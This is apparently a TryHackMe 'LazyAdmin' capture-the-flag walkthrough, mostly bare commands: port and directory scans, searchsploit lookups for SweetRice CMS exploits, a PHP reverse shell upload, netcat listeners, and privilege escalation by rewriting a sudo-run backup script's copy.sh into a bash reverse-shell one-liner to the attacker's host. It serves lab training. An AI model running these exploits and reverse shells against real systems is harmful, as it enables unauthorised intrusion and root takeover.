LazyAdmin
Room Link: https://tryhackme.com/room/lazyadmin
Scanning
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 
Kali
searchsploit sweet rice
searchsploit -m php/webapps/40718.txt
Link: https://crackstation.net/
Tried to ssh with the credentials but it didn't work, went back to searchsploit because I saw a python script before but it needed credentials. I modified the script to take the input because I waa lazy.
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
searchsploit sweet rice
searchsploit -m php/webapps/40716.py
python 40716.py
The php reverse shell setups up a reverse shell so I setup a nc listener on Kali and went to the URL the script mentioned.
Kali
nc -lvnp 1234
Get autocomplete
Victim
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Privilege Escalation
The user has access to run backup.pl without a password, I checked the the file and all it does is run a bash script. We have access to write to copy.sh so I changed it to a reverse shell one liner and setup my listener on Kali.
Kali
nc -lvnp 8080Victim
echo "bash -c 'bash -i >& /dev/tcp/$KALI/8080 0>&1'"> copy.sh
sudo /usr/bin/perl /home/itguy/backup.pl
Last updated